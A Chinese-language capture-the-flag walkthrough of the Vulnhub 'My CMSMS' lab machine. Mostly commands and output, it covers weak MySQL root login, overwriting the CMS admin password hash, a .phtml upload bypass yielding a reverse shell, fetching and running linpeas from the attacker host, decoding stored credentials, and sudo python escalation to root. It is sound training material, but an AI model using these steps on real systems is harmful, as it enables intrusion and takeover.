My CMSCMS
作者: Jason_huawen
靶机基本信息
名称:My CMSMS: 1
地址:
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/MyCMSCMS]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.61.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:75:2d:c2 1 60 PCS Systemtechnik GmbH
192.168.56.102 08:00:27:c2:c3:b5 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机IP地址为192.168.56.102
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/MyCMSCMS]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.102 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-24 21:55 EST
Nmap scan report for 192.168.56.102
Host is up (0.00015s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 27219eb53963e91f2cb26bd33a5f317b (RSA)
| 256 bf908aa5d7e5de89e61a36a193401857 (ECDSA)
|_ 256 951f329578085045cd8c7c714ad46c1c (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: CMS Made Simple - Copyright (C) 2004-2020. All rights reserved.
|_http-title: Home - My CMS
3306/tcp open mysql MySQL 8.0.19
| ssl-cert: Subject: commonName=MySQL_Server_8.0.19_Auto_Generated_Server_Certificate
| Not valid before: 2020-03-25T09:30:14
|_Not valid after: 2030-03-23T09:30:14
|_ssl-date: TLS randomness does not represent time
| mysql-info:
| Protocol: 10
| Version: 8.0.19
| Thread ID: 43
| Capabilities flags: 65535
| Some Capabilities: DontAllowDatabaseTableColumn, Speaks41ProtocolOld, Support41Auth, SwitchToSSLAfterHandshake, FoundRows, SupportsTransactions, InteractiveClient, ConnectWithDatabase, LongColumnFlag, IgnoreSigpipes, Speaks41ProtocolNew, LongPassword, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, SupportsCompression, ODBCClient, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: \x14{-\x01]Hdta\x1Be:;DH@\x0E\x13
|_ Auth Plugin Name: mysql_native_password
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.93%I=7%D=12/24%Time=63A7BB97%P=x86_64-pc-linux-gnu%r(
SF:NULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPO
SF:ptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0
SF:b\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVer
SF:sionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,
SF:2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0f
SF:Invalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0"
SF:)%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x0
SF:1\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCooki
SF:e,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\
SF:"\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05
SF:\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY
SF:000")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOption
SF:s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\
SF:x05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,
SF:"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x
SF:1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY00
SF:0")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\
SF:0\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%
SF:r(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
MAC Address: 08:00:27:C2:C3:B5 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.33 seconds
NMAP扫描结果表明目标主机有4个开放端口:22(SSH)、80(HTTP)、3306(MySQL)、33060(MySQLx)
获得Shell
MySQL
先试下mysql有无弱口令:
┌──(kali㉿kali)-[~/Vulnhub/MyCMSCMS]
┌──(kali㉿kali)-[~/Vulnhub/MyCMSCMS]
└─$ mysql -uroot -p -h 192.168.56.102
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 79
Server version: 8.0.19 MySQL Community Server - GPL
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| cmsms_db |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.002 sec)
MySQL [(none)]> use cmsms_db;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [cmsms_db]> show tables;
+--------------------------------+
| Tables_in_cmsms_db |
+--------------------------------+
| cms_additional_users |
| cms_additional_users_seq |
| cms_admin_bookmarks |
| cms_admin_bookmarks_seq |
| cms_adminlog |
| cms_content |
| cms_content_props |
| cms_content_props_seq |
| cms_content_seq |
| cms_event_handler_seq |
| cms_event_handlers |
| cms_events |
| cms_events_seq |
| cms_group_perms |
| cms_group_perms_seq |
| cms_groups |
| cms_groups_seq |
| cms_layout_design_cssassoc |
| cms_layout_design_tplassoc |
| cms_layout_designs |
| cms_layout_stylesheets |
| cms_layout_templates |
| cms_layout_tpl_addusers |
| cms_layout_tpl_categories |
| cms_layout_tpl_type |
| cms_locks |
| cms_mod_cmsjobmgr |
| cms_mod_filepicker_profiles |
| cms_module_deps |
| cms_module_news |
| cms_module_news_categories |
| cms_module_news_categories_seq |
| cms_module_news_fielddefs |
| cms_module_news_fieldvals |
| cms_module_news_seq |
| cms_module_search_index |
| cms_module_search_items |
| cms_module_search_items_seq |
| cms_module_search_words |
| cms_module_smarty_plugins |
| cms_module_templates |
| cms_modules |
| cms_permissions |
| cms_permissions_seq |
| cms_routes |
| cms_siteprefs |
| cms_user_groups |
| cms_userplugins |
| cms_userplugins_seq |
| cms_userprefs |
| cms_users |
| cms_users_seq |
| cms_version |
+--------------------------------+
53 rows in set (0.001 sec)
MySQL [cmsms_db]> select * from cms_users;
+---------+----------+----------------------------------+--------------+------------+-----------+-------------------+--------+---------------------+---------------------+
| user_id | username | password | admin_access | first_name | last_name | email | active | create_date | modified_date |
+---------+----------+----------------------------------+--------------+------------+-----------+-------------------+--------+---------------------+---------------------+
| 1 | admin | fb67c6d24e756229aab021cea7605fb3 | 1 | | | [email protected] | 1 | 2020-03-25 09:38:46 | 2020-03-26 10:49:17 |
+---------+----------+----------------------------------+--------------+------------+-----------+-------------------+--------+---------------------+---------------------+
1 row in set (0.001 sec)
MySQL [cmsms_db]>
竟然成功登录数据库,密码就是root。并得到了用户名admin以及密码哈希值。
┌──(kali㉿kali)-[~/Vulnhub/MyCMSCMS]
└─$ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# [email protected] #
#########################################################################
--------------------------------------------------
HASH: fb67c6d24e756229aab021cea7605fb3
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
尝试破解admin的密码,但是失败。我们直接直接update这个cm_users表,更新其中的password字段,查询一下made simple CMS密码的加密算法
update cms_users set password = (select md5(CONCAT(IFNULL((SELECT
sitepref_value FROM cms_siteprefs WHERE sitepref_name =
'sitemask'),''),'NEW_PASSWORD'))) where username = 'USER_NAME'
MySQL [cmsms_db]> select * from cms_users
-> ;
+---------+----------+----------------------------------+--------------+------------+-----------+-------------------+--------+---------------------+---------------------+
| user_id | username | password | admin_access | first_name | last_name | email | active | create_date | modified_date |
+---------+----------+----------------------------------+--------------+------------+-----------+-------------------+--------+---------------------+---------------------+
| 1 | admin | fb67c6d24e756229aab021cea7605fb3 | 1 | | | [email protected] | 1 | 2020-03-25 09:38:46 | 2020-03-26 10:49:17 |
+---------+----------+----------------------------------+--------------+------------+-----------+-------------------+--------+---------------------+---------------------+
1 row in set (0.001 sec)
MySQL [cmsms_db]> update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'password'))) where user_id = 1
-> ;
Query OK, 1 row affected (0.003 sec)
Rows matched: 1 Changed: 1 Warnings: 0
MySQL [cmsms_db]>
成功修改admin密码为password.
HTTP
访问80端口,返回页面得知CMS为:
CMS Made Simple version 2.2.13
┌──(kali㉿kali)-[~/Vulnhub/MyCMSCMS]
└─$ nikto -h http://192.168.56.102
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.102
+ Target Hostname: 192.168.56.102
+ Target Port: 80
+ Start Time: 2022-12-24 22:10:39 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie CMSSESSID2a2f83428536 created without the httponly flag
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /phpinfo.php: Output from the phpinfo() function was found.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify.
+ OSVDB-48: /doc/: The /doc/ directory is browsable. This may be /usr/doc.
+ OSVDB-3092: /lib/: This might be interesting...
+ OSVDB-3268: /tmp/: Directory indexing found.
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /admin/login.php: Admin login page/section found.
+ 8883 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2022-12-24 22:11:33 (GMT-5) (54 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
nikto工具扫描出目标主机有/admin目录,访问该目录,用上述修改后的密码登录:
接下来是上传shell.php,在shell.php头部添加gif,无效, 经过多次尝试,发现修改扩展名为phtml即可成功上传
┌──(kali㉿kali)-[~/Vulnhub/MyCMSCMS]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.102] 55892
Linux mycmsms 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
22:19:24 up 27 min, 0 users, load average: 0.00, 0.04, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data),1001(nagios),1002(nagcmd)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),1001(nagios),1002(nagcmd)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@mycmsms:/$ cd /home
cd /home
www-data@mycmsms:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Mar 25 2020 .
drwxr-xr-x 18 root root 4.0K Mar 25 2020 ..
drwxr-xr-x 2 armour armour 4.0K Jun 25 2020 armour
www-data@mycmsms:/home$ cd armour
cd armour
www-data@mycmsms:/home/armour$ ls -alh
ls -alh
total 32K
drwxr-xr-x 2 armour armour 4.0K Jun 25 2020 .
drwxr-xr-x 3 root root 4.0K Mar 25 2020 ..
-rw------- 1 armour armour 40 Jun 25 2020 .bash_history
-rw-r--r-- 1 armour armour 220 Mar 25 2020 .bash_logout
-rw-r--r-- 1 armour armour 3.5K Mar 25 2020 .bashrc
-rw-r--r-- 1 armour armour 807 Mar 25 2020 .profile
-rw------- 1 armour armour 736 Jun 25 2020 .viminfo
-rwsr-xr-x 1 root root 57 Jun 24 2020 binary.sh
www-data@mycmsms:/home/armour$ cat binary.sh
cat binary.sh
#!/bin/bash
echo "Usage: binary.sh COMMAND"
echo `$1`
www-data@mycmsms:/home/armour$
提权
将linpeas.sh脚本上传至目标主机/tmp目录,修改权限,并执行该脚本,脚本输出结果中:
www-data@mycmsms:/home/armour$ cd /tmp
cd /tmp
www-data@mycmsms:/tmp$ wget http://192.168.56.206:8000/linpeas.sh
wget http://192.168.56.206:8000/linpeas.sh
--2022-12-24 22:24:15-- http://192.168.56.206:8000/linpeas.sh
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765823 (748K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 747.87K --.-KB/s in 0.003s
2022-12-24 22:24:15 (262 MB/s) - 'linpeas.sh' saved [765823/765823]
www-data@mycmsms:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@mycmsms:/tmp$ ./linpeas.sh
./linpeas.sh
╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 Mar 25 2020 /usr/share/keyrings
╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/apache2/.htpasswd
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
passwd file: /var/www/html/admin/.htpasswd
www-data@mycmsms:/var/www/html/admin$ cat .htpasswd
cat .htpasswd
TUZaRzIzM1ZPSTVGRzJESk1WV0dJUUJSR0laUT09PT0=
┌──(kali㉿kali)-[~/Vulnhub/MyCMSCMS]
└─$ echo 'TUZaRzIzM1ZPSTVGRzJESk1WV0dJUUJSR0laUT09PT0=' | base64 -d | base32 -d
armour:Shield@123
www-data@mycmsms:/var/www/html/admin$ su - armour
su - armour
Password: Shield@123
armour@mycmsms:~$ id
id
uid=1000(armour) gid=1000(armour) groups=1000(armour),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
armour@mycmsms:~$ sudo -l
sudo -l
Matching Defaults entries for armour on mycmsms:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User armour may run the following commands on mycmsms:
(root) NOPASSWD: /usr/bin/python
armour@mycmsms:~$ sudo /usr/bin/python -c 'import os;os.system("/bin/bash")'
sudo /usr/bin/python -c 'import os;os.system("/bin/bash")'
root@mycmsms:/home/armour# cd /root
cd /root
root@mycmsms:~# ls -alh
ls -alh
total 56K
drwx------ 4 root root 4.0K Jun 25 2020 .
drwxr-xr-x 18 root root 4.0K Mar 25 2020 ..
-rw------- 1 root root 3.1K Jun 25 2020 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 3 root root 4.0K Mar 25 2020 .gnupg
-rw------- 1 root root 244 Mar 26 2020 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 804 Jun 24 2020 proof.txt
-rw-r--r-- 1 root root 75 Mar 27 2020 .selected_editor
drwxr-xr-x 2 root root 4.0K Mar 25 2020 .ssh
-rw------- 1 root root 12K Jun 25 2020 .viminfo
-rw-r--r-- 1 root root 303 May 31 2020 .wget-hsts
root@mycmsms:~# cat proof.txt
cat proof.txt
##############################################################################################
# Armour Infosec #
# --------- www.armourinfosec.com ------------ #
# My CMSMS #
# Designed By :- Pankaj Verma #
# Twitter :- @_p4nk4j #
##############################################################################################
**Thanks for Trying this Box**
Here's Your Flag
b315ed055787c0994d8a7b08b2be9244
root@mycmsms:~#
成功拿到root shell.
经验教训
-
如果目标主机开放了数据库端口,则需要快速测试一下是否存在弱口令漏洞。
-
当进入数据库后,无法破解出密码哈希值,此时需要想到可以更新数据库用户名的密码。